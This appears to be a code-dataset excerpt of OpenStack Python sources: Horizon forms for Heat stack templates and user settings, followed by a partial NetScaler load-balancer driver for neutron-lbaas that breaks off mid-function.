# https://bugs.launchpad.net/python-heatclient/+bug/1546166
environment_data.strip = False
template_data.strip = False
def __init__(self, *args, **kwargs):
self.next_view = kwargs.pop('next_view')
super(TemplateForm, self).__init__(*args, **kwargs)
def clean(self):
cleaned = super(TemplateForm, self).clean()
files = self.request.FILES
self.clean_uploaded_files('template', _('template'), cleaned, files)
self.clean_uploaded_files('environment', _('environment'), cleaned,
files)
# Validate the template and get back the params.
kwargs = {}
if cleaned['environment_data']:
kwargs['environment'] = cleaned['environment_data']
try:
files, tpl =\
api.heat.get_template_files(cleaned.get('template_data'),
cleaned.get('template_url'))
kwargs['files'] = files
kwargs['template'] = tpl
validated = api.heat.template_validate(self.request, **kwargs)
cleaned['template_validate'] = validated
cleaned['template_validate']['files'] = files
cleaned['template_validate']['template'] = tpl
except Exception as e:
raise forms.ValidationError(six.text_type(e))
return cleaned
def clean_uploaded_files(self, prefix, field_label, cleaned, files):
"""Cleans Template & Environment data from form upload.
Does some of the crunchy bits for processing uploads vs raw
data depending on what the user specified. Identical process
for environment data & template data.
:type prefix: str
:param prefix: prefix (environment, template) of field
:type field_label: str
:param field_label: translated prefix str for messages
        :type cleaned: dict
        :param cleaned: existing cleaned fields from form
:rtype: dict
:return: cleaned dict including environment & template data
"""
upload_str = prefix + "_upload"
data_str = prefix + "_data"
url = cleaned.get(prefix + '_url')
data = cleaned.get(prefix + '_data')
has_upload = upload_str in files
# Uploaded file handler
if has_upload and not url:
log_template_name = files[upload_str].name
LOG.info('got upload %s' % log_template_name)
tpl = files[upload_str].read()
if tpl.startswith('{'):
try:
json.loads(tpl)
except Exception as e:
msg = _('There was a problem parsing the'
' %(prefix)s: %(error)s')
msg = msg % {'prefix': prefix, 'error': six.text_type(e)}
raise forms.ValidationError(msg)
cleaned[data_str] = tpl
# URL handler
elif url and (has_upload or data):
msg = _('Please specify a %s using only one source method.')
msg = msg % field_label
raise forms.ValidationError(msg)
elif prefix == 'template':
# Check for raw template input - blank environment allowed
if not url and not data:
msg = _('You must specify a template via one of the '
'available sources.')
raise forms.ValidationError(msg)
def create_kwargs(self, data):
kwargs = {'parameters': data['template_validate'],
'environment_data': data['environment_data']}
if data.get('stack_id'):
kwargs['stack_id'] = data['stack_id']
return kwargs
def handle(self, request, data):
kwargs = self.create_kwargs(data)
# NOTE (gabriel): This is a bit of a hack, essentially rewriting this
# request so that we can chain it as an input to the next view...
# but hey, it totally works.
request.method = 'GET'
return self.next_view.as_view()(request, **kwargs)
class ChangeTemplateForm(TemplateForm):
class Meta(object):
name = _('Edit Template')
help_text = _('Select a new template to re-launch a stack.')
stack_id = forms.CharField(label=_('Stack ID'),
widget=forms.widgets.HiddenInput)
stack_name = forms.CharField(label=_('Stack Name'),
widget=forms.TextInput(attrs={'readonly':
'readonly'}))
class PreviewTemplateForm(TemplateForm):
class Meta(object):
name = _('Preview Template')
help_text = _('Select a new template to preview a stack.')
class CreateStackForm(forms.SelfHandlingForm):
param_prefix = '__param_'
class Meta(object):
name = _('Create Stack')
environment_data = forms.CharField(
widget=forms.widgets.HiddenInput,
required=False)
if django.VERSION >= (1, 9):
        # Note(Itxaka): On django>=1.9 CharField has a strip option that
        # we need to set to False so as not to hit
# https://bugs.launchpad.net/python-heatclient/+bug/1546166
environment_data.strip = False
parameters = forms.CharField(
widget=forms.widgets.HiddenInput)
stack_name = forms.RegexField(
max_length=255,
label=_('Stack Name'),
help_text=_('Name of the stack to create.'),
regex=r"^[a-zA-Z][a-zA-Z0-9_.-]*$",
error_messages={'invalid':
_('Name must start with a letter and may '
'only contain letters, numbers, underscores, '
'periods and hyphens.')})
timeout_mins = forms.IntegerField(
initial=60,
label=_('Creation Timeout (minutes)'),
help_text=_('Stack creation timeout in minutes.'))
enable_rollback = forms.BooleanField(
label=_('Rollback On Failure'),
help_text=_('Enable rollback on create/update failure.'),
required=False)
def __init__(self, *args, **kwargs):
parameters = kwargs.pop('parameters')
# special case: load template data from API, not passed in params
if kwargs.get('validate_me'):
parameters = kwargs.pop('validate_me')
super(CreateStackForm, self).__init__(*args, **kwargs)
if self._stack_password_enabled():
self.fields['password'] = forms.CharField(
label=_('Password for user "%s"') % self.request.user.username,
help_text=_('This is required for operations to be performed '
'throughout the lifecycle of the stack'),
widget=forms.PasswordInput())
self._build_parameter_fields(parameters)
def _stack_password_enabled(self):
stack_settings = getattr(settings, 'OPENSTACK_HEAT_STACK', {})
return stack_settings.get('enable_user_pass', True)
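        # Illustrative setting (hypothetical value): adding
        # OPENSTACK_HEAT_STACK = {'enable_user_pass': False} to the Django
        # settings would hide the extra password field built in __init__.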
def _build_parameter_fields(self, template_validate):
self.help_text = template_validate['Description']
params = template_validate.get('Parameters', {})
if template_validate.get('ParameterGroups'):
params_in_order = []
for group in template_validate['ParameterGroups']:
for param in group.get('parameters', []):
if param in params:
params_in_order.append((param, params[param]))
else:
# no parameter groups, simply sorted to make the order fixed
params_in_order = sorted(params.items())
for param_key, param in params_in_order:
field = None
field_key = self.param_prefix + param_key
field_args = {
'initial': param.get('Default', None),
'label': param.get('Label', param_key),
'help_text': html.escape(param.get('Description', '')),
'required': param.get('Default', None) is None
}
param_type = param.get('Type', None)
hidden = strutils.bool_from_string(param.get('NoEcho', 'false'))
if 'CustomConstraint' in param:
choices = self._populate_custom_choices(
param['CustomConstraint'])
field_args['choices'] = choices
field = forms.ChoiceField(**field_args)
elif 'AllowedValues' in param:
choices = map(lambda x: (x, x), param['AllowedValues'])
field_args['choices'] = choices
field = forms.ChoiceField(**field_args)
elif param_type == 'Json' and 'Default' in param:
field_args['initial'] = json.dumps(param['Default'])
field = forms.CharField(**field_args)
elif param_type in ('CommaDelimitedList', 'String', 'Json'):
if 'MinLength' in param:
field_args['min_length'] = int(param['MinLength'])
field_args['required'] = field_args['min_length'] > 0
if 'MaxLength' in param:
field_args['max_length'] = int(param['MaxLength'])
if hidden:
field_args['widget'] = forms.PasswordInput(
render_value=True)
field = forms.CharField(**field_args)
elif param_type == 'Number':
if 'MinValue' in param:
field_args['min_value'] = int(param['MinValue'])
if 'MaxValue' in param:
field_args['max_value'] = int(param['MaxValue'])
field = forms.IntegerField(**field_args)
elif param_type == 'Boolean':
field_args['required'] = False
field = forms.BooleanField(**field_args)
if field:
self.fields[field_key] = field
@sensitive_variables('password')
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('password'):
fields['password'] = data.get('password')
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
api.heat.stack_create(self.request, **fields)
messages.info(request, _("Stack creation started."))
return True
except Exception:
exceptions.handle(request)
def _populate_custom_choices(self, custom_type):
if custom_type == 'neutron.network':
return instance_utils.network_field_data(self.request, True)
if custom_type == 'nova.keypair':
return instance_utils.keypair_field_data(self.request, True)
if custom_type == 'glance.image':
return image_utils.image_field_data(self.request, True)
if custom_type == 'nova.flavor':
return instance_utils.flavor_field_data(self.request, True)
return []
class EditStackForm(CreateStackForm):
class Meta(object):
name = _('Update Stack Parameters')
stack_id = forms.CharField(
label=_('Stack ID'),
widget=forms.widgets.HiddenInput)
stack_name = forms.CharField(
label=_('Stack Name'),
widget=forms.TextInput(attrs={'readonly': 'readonly'}))
@sensitive_variables('password')
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
stack_id = data.get('stack_id')
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('password'):
fields['password'] = data.get('password')
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
api.heat.stack_update(self.request, stack_id=stack_id, **fields)
messages.info(request, _("Stack update started."))
return True
except Exception:
exceptions.handle(request)
class PreviewStackForm(CreateStackForm):
class Meta(object):
name = _('Preview Stack Parameters')
def __init__(self, *args, **kwargs):
self.next_view = kwargs.pop('next_view')
super(CreateStackForm, self).__init__(*args, **kwargs)
def handle(self, request, data):
prefix_length = len(self.param_prefix)
params_list = [(k[prefix_length:], v) for (k, v) in data.items()
if k.startswith(self.param_prefix)]
fields = {
'stack_name': data.get('stack_name'),
'timeout_mins': data.get('timeout_mins'),
'disable_rollback': not(data.get('enable_rollback')),
'parameters': dict(params_list),
'files': json.loads(data.get('parameters')).get('files'),
'template': json.loads(data.get('parameters')).get('template')
}
if data.get('environment_data'):
fields['environment'] = data.get('environment_data')
try:
stack_preview = api.heat.stack_preview(self.request, **fields)
request.method = 'GET'
return self.next_view.as_view()(request,
stack_preview=stack_preview)
except Exception:
exceptions.handle(request)
```
#### File: settings/user/forms.py
```python
from datetime import datetime # noqa
from datetime import timedelta # noqa
import string
import babel
import babel.dates
from django.conf import settings
from django import shortcuts
from django.utils import encoding
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
import pytz
from horizon import forms
from horizon import messages
from horizon.utils import functions
class UserSettingsForm(forms.SelfHandlingForm):
max_value = getattr(settings, 'API_RESULT_LIMIT', 1000)
language = forms.ChoiceField(label=_("Language"))
timezone = forms.ChoiceField(label=_("Timezone"))
pagesize = forms.IntegerField(label=_("Items Per Page"),
min_value=1,
max_value=max_value)
instance_log_length = forms.IntegerField(
label=_("Log Lines Per Instance"), min_value=1,
help_text=_("Number of log lines to be shown per instance"))
@staticmethod
def _sorted_zones():
d = datetime(datetime.today().year, 1, 1)
zones = [(tz, pytz.timezone(tz).localize(d).strftime('%z'))
for tz in pytz.common_timezones]
zones.sort(key=lambda zone: int(zone[1]))
return zones
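        # Illustrative entry (hypothetical): the sorted list contains tuples
        # such as ('Pacific/Midway', '-1100'), ordered by numeric UTC offset.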
def __init__(self, *args, **kwargs):
super(UserSettingsForm, self).__init__(*args, **kwargs)
# Languages
def get_language_display_name(code, desc):
try:
desc = translation.get_language_info(code)['name_local']
desc = string.capwords(desc)
except KeyError:
# If a language is not defined in django.conf.locale.LANG_INFO
# get_language_info raises KeyError
pass
return "%s (%s)" % (desc, code)
languages = [(k, get_language_display_name(k, v))
for k, v in settings.LANGUAGES]
self.fields['language'].choices = languages
# Timezones
timezones = []
language = translation.get_language()
current_locale = translation.to_locale(language)
babel_locale = babel.Locale.parse(current_locale)
for tz, offset in self._sorted_zones():
try:
utc_offset = _("UTC %(hour)s:%(min)s") % {"hour": offset[:3],
"min": offset[3:]}
except Exception:
utc_offset = ""
if tz == "UTC":
tz_name = _("UTC")
elif tz == "GMT":
tz_name = _("GMT")
else:
tz_label = babel.dates.get_timezone_location(
tz, locale=babel_locale)
# Translators: UTC offset and timezone label
tz_name = _("%(offset)s: %(label)s") % {"offset": utc_offset,
"label": tz_label}
timezones.append((tz, tz_name))
self.fields['timezone'].choices = timezones
        # When a help_text that uses a variable is defined together with the
        # form field, translation does not work well.
        # To avoid this, we define it here. (#1563021)
self.fields['pagesize'].help_text = (
_("Number of items to show per page (applies to the pages "
"that have API supported pagination, Max Value: %s)")
% self.max_value)
def handle(self, request, data):
response = shortcuts.redirect(request.build_absolute_uri())
lang_code = data['language']
if lang_code and translation.check_for_language(lang_code):
response = functions.save_config_value(
request, response, settings.LANGUAGE_COOKIE_NAME, lang_code)
response = functions.save_config_value(
request, response, 'django_timezone',
pytz.timezone(data['timezone']).zone)
response = functions.save_config_value(
request, response, 'API_RESULT_PAGE_SIZE', data['pagesize'])
response = functions.save_config_value(
request, response, 'INSTANCE_LOG_LENGTH',
data['instance_log_length'])
with translation.override(lang_code):
messages.success(request,
encoding.force_text(_("Settings saved.")))
return response
``` |
{
"source": "2020human/neutron-lbaas",
"score": 2
} |
#### File: drivers/netscaler/netscaler_driver_v2.py
```python
import abc
from oslo_config import cfg
from oslo_log import log as logging
from neutron import context as ncontext
from neutron.plugins.common import constants
from oslo_service import service
from neutron_lbaas._i18n import _, _LE
from neutron_lbaas.drivers import driver_base
from neutron_lbaas.drivers import driver_mixins
from neutron_lbaas.services.loadbalancer.drivers.netscaler import ncc_client
DEFAULT_PERIODIC_TASK_INTERVAL = "2"
DEFAULT_STATUS_COLLECTION = "True"
DEFAULT_PAGE_SIZE = "300"
DEFAULT_IS_SYNCRONOUS = "True"
PROV = "provisioning_status"
NETSCALER = "netscaler"
LOG = logging.getLogger(__name__)
NETSCALER_CC_OPTS = [
cfg.StrOpt(
'netscaler_ncc_uri',
help=_('The URL to reach the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_username',
        help=_('Username to log in to the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_password',
secret=True,
        help=_('Password to log in to the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'periodic_task_interval',
default=DEFAULT_PERIODIC_TASK_INTERVAL,
        help=_('Setting for periodic task collection interval from '
               'the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'is_synchronous',
default=DEFAULT_IS_SYNCRONOUS,
        help=_('Setting for option to enable synchronous operations with '
               'the NetScaler Control Center Server.'),
),
cfg.StrOpt(
'netscaler_ncc_cleanup_mode',
help=_(
'Setting to enable/disable cleanup mode for NetScaler Control '
'Center Server'),
),
cfg.StrOpt(
'netscaler_status_collection',
default=DEFAULT_STATUS_COLLECTION + "," + DEFAULT_PAGE_SIZE,
        help=_('Setting for member status collection from '
               'the NetScaler Control Center Server.'),
)
]
if not hasattr(cfg.CONF, "netscaler_driver"):
cfg.CONF.register_opts(NETSCALER_CC_OPTS, 'netscaler_driver')
LBS_RESOURCE = 'loadbalancers'
LB_RESOURCE = 'loadbalancer'
LISTENERS_RESOURCE = 'listeners'
LISTENER_RESOURCE = 'listener'
POOLS_RESOURCE = 'pools'
POOL_RESOURCE = 'pool'
MEMBERS_RESOURCE = 'members'
MEMBER_RESOURCE = 'member'
MONITORS_RESOURCE = 'healthmonitors'
MONITOR_RESOURCE = 'healthmonitor'
STATS_RESOURCE = 'stats'
PROV_SEGMT_ID = 'provider:segmentation_id'
PROV_NET_TYPE = 'provider:network_type'
DRIVER_NAME = 'netscaler_driver'
RESOURCE_PREFIX = 'v2.0/lbaas'
STATUS_PREFIX = 'oca/v2'
MEMBER_STATUS = 'memberstatus'
PAGE = 'page'
SIZE = 'size'
PROVISIONING_STATUS_TRACKER = []
class NetScalerLoadBalancerDriverV2(driver_base.LoadBalancerBaseDriver):
def __init__(self, plugin):
super(NetScalerLoadBalancerDriverV2, self).__init__(plugin)
self.driver_conf = cfg.CONF.netscaler_driver
self.admin_ctx = ncontext.get_admin_context()
self._init_client()
self._init_managers()
self._init_status_collection()
def _init_client(self):
ncc_uri = self.driver_conf.netscaler_ncc_uri
ncc_username = self.driver_conf.netscaler_ncc_username
ncc_password = self.driver_conf.netscaler_ncc_password
ncc_cleanup_mode = cfg.CONF.netscaler_driver.netscaler_ncc_cleanup_mode
self.client = ncc_client.NSClient(ncc_uri,
ncc_username,
ncc_password,
ncc_cleanup_mode)
def _init_managers(self):
self.load_balancer = NetScalerLoadBalancerManager(self)
self.listener = NetScalerListenerManager(self)
self.pool = NetScalerPoolManager(self)
self.member = NetScalerMemberManager(self)
self.health_monitor = NetScalerHealthMonitorManager(self)
def _init_status_collection(self):
self.status_conf = self.driver_conf.netscaler_status_collection
self.periodic_task_interval = self.driver_conf.periodic_task_interval
status_conf = self.driver_conf.netscaler_status_collection
(is_status_collection,
pagesize_status_collection) = status_conf.split(",")
self.is_status_collection = True
if is_status_collection.lower() == "false":
self.is_status_collection = False
self.pagesize_status_collection = pagesize_status_collection
self._init_pending_status_tracker()
NetScalerStatusService(self).start()
def _init_pending_status_tracker(self):
# Initialize PROVISIONING_STATUS_TRACKER for loadbalancers in
# pending state
db_lbs = self.plugin.db.get_loadbalancers(
self.admin_ctx)
for db_lb in db_lbs:
if ((db_lb.id not in PROVISIONING_STATUS_TRACKER) and
(db_lb.provider.provider_name == NETSCALER) and
(db_lb.provisioning_status.startswith("PENDING_"))):
PROVISIONING_STATUS_TRACKER.append(db_lb.id)
def collect_provision_status(self):
msg = ("Collecting status ", self.periodic_task_interval)
LOG.debug(msg)
self._update_loadbalancers_provision_status()
def _update_loadbalancers_provision_status(self):
for lb_id in PROVISIONING_STATUS_TRACKER:
lb_statuses = self._get_loadbalancer_statuses(lb_id)
if lb_statuses:
self._update_status_tree_in_db(
lb_id, lb_statuses["lb_statuses"])
def _get_loadbalancer_statuses(self, lb_id):
"""Retrieve listener status from Control Center."""
resource_path = "%s/%s/%s/statuses" % (RESOURCE_PREFIX,
LBS_RESOURCE,
lb_id)
try:
statuses = self.client.retrieve_resource(
"GLOBAL", resource_path)[1]['dict']
except ncc_client.NCCException as e:
if e.is_not_found_exception():
return {"lb_statuses": None}
else:
return None
statuses = statuses["statuses"]
return {"lb_statuses": statuses}
def _update_status_tree_in_db(self, lb_id, loadbalancer_statuses):
track_loadbalancer = {"track": False}
db_lb = self.plugin.db.get_loadbalancer(self.admin_ctx,
lb_id)
if (not loadbalancer_statuses and
db_lb.provisioning_status == constants.PENDING_DELETE):
try:
self.load_balancer.successful_completion(
self.admin_ctx, db_lb, delete=True)
except Exception:
LOG.error(_LE("error with successful completion"))
PROVISIONING_STATUS_TRACKER.remove(lb_id)
return
else:
status_lb = loadbalancer_statuses["loadbalancer"]
status_listeners = status_lb["listeners"]
for db_listener in db_lb.listeners:
db_listener.loadbalancer = db_lb
status_listener = (self.
_update_entity_status_in_db(track_loadbalancer,
db_listener,
status_listeners,
self.listener))
if not status_listener:
continue
db_pool = db_listener.default_pool
if not db_pool:
continue
db_pool.listener = db_listener
status_pools = status_listener['pools']
status_pool = self._update_entity_status_in_db(track_loadbalancer,
db_pool,
status_pools,
self.pool)
db_members = db_pool.members
if not status_pool:
continue
status_members = status_pool['members']
for db_member in db_members:
db_member.pool = db_pool
self._update_entity_status_in_db(track_loadbalancer,
db_member,
status_members,
self.member)
db_hm = db_pool.healthmonitor
if db_hm:
db_hm.pool = db_pool
status_hm = status_pool['healthmonitor']
self._update_entity_status_in_db(track_loadbalancer,
db_hm,
[status_hm],
self.health_monitor)
if not track_loadbalancer['track']:
self._update_entity_status_in_db(
track_loadbalancer, db_lb, status_lb, self.load_balancer)
if not track_loadbalancer['track']:
PROVISIONING_STATUS_TRACKER.remove(lb_id)
def _update_entity_status_in_db(self, track_loadbalancer,
db_entity,
status_entities,
entity_manager):
if isinstance(status_entities, list):
entity_status = self._get_entity_status(
db_entity.id, status_entities)
else:
entity_status = status_entities
self._check_and_update_entity_status_in_db(
track_loadbalancer, db_entity, entity_status, entity_manager)
return entity_status
def _get_entity_status(self, entity_id, entities_status):
for entity_status in entities_status:
if entity_status and entity_status['id'] == entity_id:
return entity_status
return None
def _check_and_update_entity_status_in_db(self, track_loadbalancer,
db_entity,
entity_status, entity_manager):
if not db_entity.provisioning_status.startswith("PENDING_"):
# no operation is attempted on this entity
return
if entity_status:
if entity_status[PROV].startswith("PENDING_"):
# an entity is not finished provisioning. Continue to track
track_loadbalancer['track'] = True
return
if entity_status[PROV] == constants.ERROR:
# Marked for failed completion
try:
entity_manager.failed_completion(
self.admin_ctx, db_entity)
except Exception:
LOG.error(_LE("error with failed completion"))
return
if db_entity.provisioning_status == constants.PENDING_DELETE:
# entity is under deletion
            # if entity is missing in lb status tree it should be
# deleted
if entity_status:
                LOG.error('Invalid status set for delete of %s in statuses',
                          db_entity.id)
return
try:
entity_manager.successful_completion(
self.admin_ctx, db_entity, delete=True)
except Exception:
LOG.error(_LE("error with successful completion"))
return
if entity_status[PROV] != constants.ACTIVE:
            LOG.error('Invalid prov status for %s, should be ACTIVE '
                      'for CREATE and UPDATE',
                      db_entity.id)
return
try:
entity_manager.successful_completion(
self.admin_ctx, db_entity)
except Exception:
LOG.error(_LE("error with successful completion"))
return
class NetScalerCommonManager(driver_mixins.BaseManagerMixin):
def __init__(self, driver):
super(NetScalerCommonManager, self).__init__(driver)
self.payload_preparer = PayloadPreparer()
self.client = self.driver.client
self.is_synchronous = self.driver.driver_conf.is_synchronous
if self.is_synchronous.lower() == "false":
self.is_synchronous = False
else:
self.is_synchronous = True
def create(self, context, obj):
LOG.debug("%s, create %s", self.__class__.__name__, obj.id)
try:
self.create_entity(context, obj)
if self.is_synchronous:
self.successful_completion(context, obj)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def update(self, context, old_obj, obj):
LOG.debug("%s, update %s", self.__class__.__name__, old_obj.id)
try:
self.update_entity(context, old_obj, obj)
if self.is_synchronous:
self.successful_completion(context, obj)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def delete(self, context, obj):
LOG.debug("%s, delete %s", self.__class__.__name__, obj.id)
try:
self.delete_entity(context, obj)
if self.is_synchronous:
self.successful_completion(context, obj, delete=True)
else:
self.track_provision_status(obj)
except Exception:
self.failed_completion(context, obj)
raise
def track_provision_status(self, obj):
for lb in self._get_loadbalancers(obj):
if lb.id not in PROVISIONING_STATUS_TRACKER:
PROVISIONING_STATUS_TRACKER.append(lb.id)
def _get_loadbalancers(self, obj):
lbs = []
lbs.append(obj.root_loadbalancer)
return lbs
@abc.abstractmethod
def create_entity(self, context, obj):
pass
@abc.abstractmethod
def update_entity(self, context, old_obj, obj):
pass
@abc.abstractmethod
def delete_entity(self, context, obj):
pass
class NetScalerLoadBalancerManager(NetScalerCommonManager,
driver_base.BaseLoadBalancerManager):
def __init__(self, driver):
driver_base.BaseLoadBalancerManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def refresh(self, context, lb_obj):
# This is intended to trigger the backend to check and repair
# the state of this load balancer and all of its dependent objects
LOG.debug("LB refresh %s", lb_obj.id)
def stats(self, context, lb_obj):
pass
def create_entity(self, context, lb_obj):
ncc_lb = self.payload_preparer.prepare_lb_for_creation(lb_obj)
vip_subnet_id = lb_obj.vip_subnet_id
network_info = self.payload_preparer.\
get_network_info(context, self.driver.plugin, vip_subnet_id)
ncc_lb.update(network_info)
msg = _("NetScaler driver lb creation: %s") % repr(ncc_lb)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
LB_RESOURCE, ncc_lb)
def update_entity(self, context, old_lb_obj, lb_obj):
update_lb = self.payload_preparer.prepare_lb_for_update(lb_obj)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)
msg = (_("NetScaler driver lb_obj %(lb_obj_id)s update: %(lb_obj)s") %
{"lb_obj_id": old_lb_obj.id, "lb_obj": repr(lb_obj)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
LB_RESOURCE, update_lb)
def delete_entity(self, context, lb_obj):
"""Delete a loadbalancer on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LBS_RESOURCE, lb_obj.id)
msg = _("NetScaler driver lb_obj removal: %s") % lb_obj.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerListenerManager(NetScalerCommonManager,
driver_base.BaseListenerManager):
def __init__(self, driver):
driver_base.BaseListenerManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def stats(self, context, listener):
# returning dummy status now
LOG.debug(
"Tenant id %s , Listener stats %s", context.tenant_id, listener.id)
return {
"bytes_in": 0,
"bytes_out": 0,
"active_connections": 0,
"total_connections": 0
}
def create_entity(self, context, listener):
"""Listener is created with loadbalancer """
ncc_listener = self.payload_preparer.prepare_listener_for_creation(
listener)
msg = _("NetScaler driver listener creation: %s") % repr(ncc_listener)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
LISTENER_RESOURCE, ncc_listener)
def update_entity(self, context, old_listener, listener):
update_listener = self.payload_preparer.prepare_listener_for_update(
listener)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE,
listener.id)
msg = (_("NetScaler driver listener %(listener_id)s "
"update: %(listener_obj)s") %
{"listener_id": old_listener.id,
"listener_obj": repr(listener)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
LISTENER_RESOURCE, update_listener)
def delete_entity(self, context, listener):
"""Delete a listener on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, LISTENERS_RESOURCE,
listener.id)
msg = _("NetScaler driver listener removal: %s") % listener.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerPoolManager(NetScalerCommonManager,
driver_base.BasePoolManager):
def __init__(self, driver):
driver_base.BasePoolManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, pool):
ncc_pool = self.payload_preparer.prepare_pool_for_creation(
pool)
msg = _("NetScaler driver pool creation: %s") % repr(ncc_pool)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
POOL_RESOURCE, ncc_pool)
def update_entity(self, context, old_pool, pool):
update_pool = self.payload_preparer.prepare_pool_for_update(pool)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
pool.id)
msg = (_("NetScaler driver pool %(pool_id)s update: %(pool_obj)s") %
{"pool_id": old_pool.id, "pool_obj": repr(pool)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
POOL_RESOURCE, update_pool)
def delete_entity(self, context, pool):
"""Delete a pool on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
pool.id)
msg = _("NetScaler driver pool removal: %s") % pool.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerMemberManager(NetScalerCommonManager,
driver_base.BaseMemberManager):
def __init__(self, driver):
driver_base.BaseMemberManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, member):
ncc_member = self.payload_preparer.prepare_member_for_creation(member)
subnet_id = member.subnet_id
network_info = (self.payload_preparer.
get_network_info(context, self.driver.plugin,
subnet_id))
ncc_member.update(network_info)
msg = _("NetScaler driver member creation: %s") % repr(ncc_member)
LOG.debug(msg)
parent_pool_id = member.pool.id
resource_path = "%s/%s/%s/%s" % (RESOURCE_PREFIX, POOLS_RESOURCE,
parent_pool_id, MEMBERS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
MEMBER_RESOURCE, ncc_member)
def update_entity(self, context, old_member, member):
parent_pool_id = member.pool.id
update_member = self.payload_preparer.prepare_member_for_update(member)
resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX,
POOLS_RESOURCE,
parent_pool_id,
MEMBERS_RESOURCE,
member.id)
msg = (_("NetScaler driver member %(member_id)s "
"update: %(member_obj)s") %
{"member_id": old_member.id, "member_obj": repr(member)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
MEMBER_RESOURCE, update_member)
def delete_entity(self, context, member):
"""Delete a member on a NetScaler device."""
parent_pool_id = member.pool.id
resource_path = "%s/%s/%s/%s/%s" % (RESOURCE_PREFIX,
POOLS_RESOURCE,
parent_pool_id,
MEMBERS_RESOURCE,
member.id)
msg = _("NetScaler driver member removal: %s") % member.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class NetScalerHealthMonitorManager(NetScalerCommonManager,
driver_base.BaseHealthMonitorManager):
def __init__(self, driver):
driver_base.BaseHealthMonitorManager.__init__(self, driver)
NetScalerCommonManager.__init__(self, driver)
def create_entity(self, context, hm):
ncc_hm = self.payload_preparer.prepare_healthmonitor_for_creation(hm)
msg = _("NetScaler driver healthmonitor creation: %s") % repr(ncc_hm)
LOG.debug(msg)
resource_path = "%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE)
self.client.create_resource(context.tenant_id, resource_path,
MONITOR_RESOURCE, ncc_hm)
def update_entity(self, context, old_healthmonitor, hm):
update_hm = self.payload_preparer.prepare_healthmonitor_for_update(hm)
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE,
hm.id)
msg = (_("NetScaler driver healthmonitor %(healthmonitor_id)s "
"update: %(healthmonitor_obj)s") %
{"healthmonitor_id": old_healthmonitor.id,
"healthmonitor_obj": repr(hm)})
LOG.debug(msg)
self.client.update_resource(context.tenant_id, resource_path,
MONITOR_RESOURCE, update_hm)
def delete_entity(self, context, hm):
"""Delete a healthmonitor on a NetScaler device."""
resource_path = "%s/%s/%s" % (RESOURCE_PREFIX, MONITORS_RESOURCE,
hm.id)
msg = _("NetScaler driver healthmonitor removal: %s") % hm.id
LOG.debug(msg)
self.client.remove_resource(context.tenant_id, resource_path)
class PayloadPreparer(object):
def prepare_lb_for_creation(self, lb):
creation_attrs = {
'id': lb.id,
'tenant_id': lb.tenant_id,
'vip_address': lb.vip_address,
'vip_subnet_id': lb.vip_subnet_id,
}
update_attrs = self.prepare_lb_for_update(lb)
creation_attrs.update(update_attrs)
return creation_attrs
def prepare_lb_for_update(self, lb):
return {
'name': lb.name,
'description': lb.description,
'admin_state_up': lb.admin_state_up,
}
def prepare_listener_for_creation(self, listener):
creation_attrs = {
'id': listener.id,
'tenant_id': listener.tenant_id,
'protocol': listener.protocol,
'protocol_port': listener.protocol_port,
'loadbalancer_id': listener.loadbalancer_id
}
update_attrs = self.prepare_listener_for_update(listener)
